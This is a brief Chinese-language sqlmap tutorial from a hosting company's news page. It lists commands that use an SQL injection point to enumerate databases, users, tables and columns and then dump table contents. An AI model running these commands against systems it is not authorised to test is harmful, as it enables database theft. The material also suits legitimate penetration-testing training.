新闻资讯
行业资讯
sqlmap实战教程 SQLMAP注入拖库常用命令
2017-12-15 17:25:03
摘要:SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。

SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。

#>  ./sqlmap.py -u “注入地址” -v 1 --dbs   // 列举数据库 

#> ./sqlmap.py -u “注入地址” -v 1 --current-db   // 当前数据库

#>./sqlmap.py -u “注入地址” -v 1 --users    // 列数据库用户

#>  ./sqlmap.py -u “注入地址” -v 1 --current-user  // 当前用户

#>  ./sqlmap.py -u “注入地址” -v 1 --tables -D “数据库”   // 列举数据库的表名

#> ./sqlmap.py -u “注入地址” -v 1 --columns -T “表名” -D “数据库”   // 获取表的列名

#>./sqlmap.py -u “注入地址” -v 1 --dump -C “字段,字段” -T “表名” -D “数据库”   // 获取表中的数据,包含列 

已经开始拖库了,SQLMAP是非常人性化的,它会将获取的数据存储sqlmap/output/中

USA-IDC为您提供免备案服务器 0元试用
立即联系在线客服,即可申请免费产品试用服务
立即申请